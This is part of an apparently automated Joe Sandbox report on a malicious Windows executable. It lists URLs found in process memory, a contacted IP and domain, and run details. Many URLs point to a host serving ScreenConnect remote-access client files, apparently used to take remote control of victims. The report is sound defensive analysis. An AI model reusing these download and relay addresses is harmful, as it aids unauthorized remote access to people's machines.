                                                          https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://secure.stansup.comdfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A249000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://Passport.NET/tbAsvchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.applicationO3dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://secure.stansup.com/Bin/ScreenConnect.Client.application1ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe8dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://g.live.com/odclientsettings/Prod.C:edb.log.7.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://secure.stansup.cdfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.applicationGUdfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config~&dfsvc.exe, 00000002.00000002.2252252771.00000276A2AF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe(Tdfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdssvchost.exe, 00000008.00000003.1514111409.000001CEA3179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://login.microsoftonline.com/ppsecure/devicechangecredential.srfsvchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exeNUdfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.applicationdfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.0000000002421000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Client.applicationXScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedfsvc.exe, 00000002.00000002.2237912718.0000027689FE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001405000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://secure.stansup.com/Bin/ScreenConnect.Cdfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://Passport.NET/tb_svchost.exe, 00000008.00000002.2607941732.000001CEA28B4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://secure.staPJhdfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdst=svchost.exe, 00000008.00000003.1413548396.000001CEA3153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Windows.dllxdfsvc.exe, 00000002.00000002.2256114237.00000276A41AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configLdfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuersvchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Client.dllIdfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsvchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://account.live.com/msangcwamsvchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388501755.000001CEA3157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.Client.applicationMO3dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.Windopdfsvc.exe, 00000002.00000002.2237912718.000002768A717000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://www.w3.ordfsvc.exe, 00000002.00000002.2237912718.000002768A512000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A535000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A59C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appldfsvc.exe, 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.manifest001O3dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          http://crl.ver)svchost.exe, 00000007.00000002.2610850094.0000025CF7A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxsvchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://secure.stansup.com/Bin/ScreenConnect.Client.applicationnScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://passport.net/tbsvchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://secure.staPdfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.Core.dllYdfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issueuesvchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.applicationtvdfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdxmlns:svchost.exe, 00000008.00000003.1413548396.000001CEA3153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://secure.stansup.com/Bin/ScreenConnect.Client.applicationtdfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://secure.stansup.com/Bin/ScreenConnect.Windodfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe=dfsvc.exe, 00000002.00000002.2256114237.00000276A41A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://account.live.com/msangcwamesvchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or5W9VLRZG.log.2.drfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.dlladfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configjdfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://schemas.xmlsoap.org/ws/20svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://secure.stansup.com/Bin/ScreenConnect.Client.manifestMdfsvc.exe, 00000002.00000002.2252252771.00000276A2BBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAsvchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exXdfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exeyUdfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://secure.stansup.com/Bin/ScreScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000599000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://account.live.com/Wizard/Password/Change?id=806013svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://secure.staPbdfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesuesvchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee0svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee1svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAsvchost.exe, 00000008.00000003.1476705098.000001CEA3129000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exexdfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492090712.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://secure.stansup.com/Bin/ScreenConnect.Client.application.MO3ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              http://Passport.NET/STSsvchost.exe, 00000008.00000002.2608730032.000001CEA315F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492594323.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllkU9dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://docs.oasis-open.org/wss/2svchost.exe, 00000008.00000003.1542897371.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://www.w3.svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000002.00000002.2237912718.000002768A070000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://account.live.com/InlineSignup.aspx?iww=1&id=80502ssuersvchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://www.w3.odfsvc.exe, 00000002.00000002.2237912718.000002768A512000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A4A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1745338793.000000001ACF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          http://Passport.NET/tbsvchost.exe, 00000008.00000002.2609938156.000001CEA36C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507259190.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2609998357.000001CEA36DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1389610111.000001CEA3153000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 00000008.00000003.1524817078.000001CEA3178000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1476303270.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492473258.000001CEA3174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455119455.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477068700.000001CEA316E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2608495004.000001CEA3100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477152749.000001CEA3110000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455865428.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1455646765.000001CEA310E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1492113188.000001CEA315C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://secure.stansup.com/Bin/ScreenConnect.Clientdfsvc.exe, 00000002.00000002.2236254474.0000027688762000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 00000008.00000003.1477048595.000001CEA316D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		unknown

                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                79.110.49.185
                                                                                                                                                                                                                		secure.stansup.comGermany
                                                                                                                                                                                                                		57287OTAVANET-ASCZfalse

                                                                                                                                                                                                                Private

                                                                                                                                                                                                                IP
                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                Analysis ID:1542316
                                                                                                                                                                                                                Start date and time:2024-10-25 19:26:13 +02:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 8m 7s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:17
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Sample name:96r3GgxntQ.exe
                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                Original Sample Name:a266e99dde8b25878921f9e8447b99b877d08a13476d0b3e2d840b5d296feb0f.exe
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal66.evad.winEXE@18/77@2/2
                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                • Successful, ratio: 83.3%
                                                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 40.126.31.69, 20.190.159.75, 40.126.31.67, 20.190.159.2, 20.190.159.68, 40.126.31.73, 40.126.31.71, 20.190.159.73, 199.232.214.172, 192.229.221.95, 184.28.90.27, 20.42.65.92
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, cacerts.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 5292 because it is empty
                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
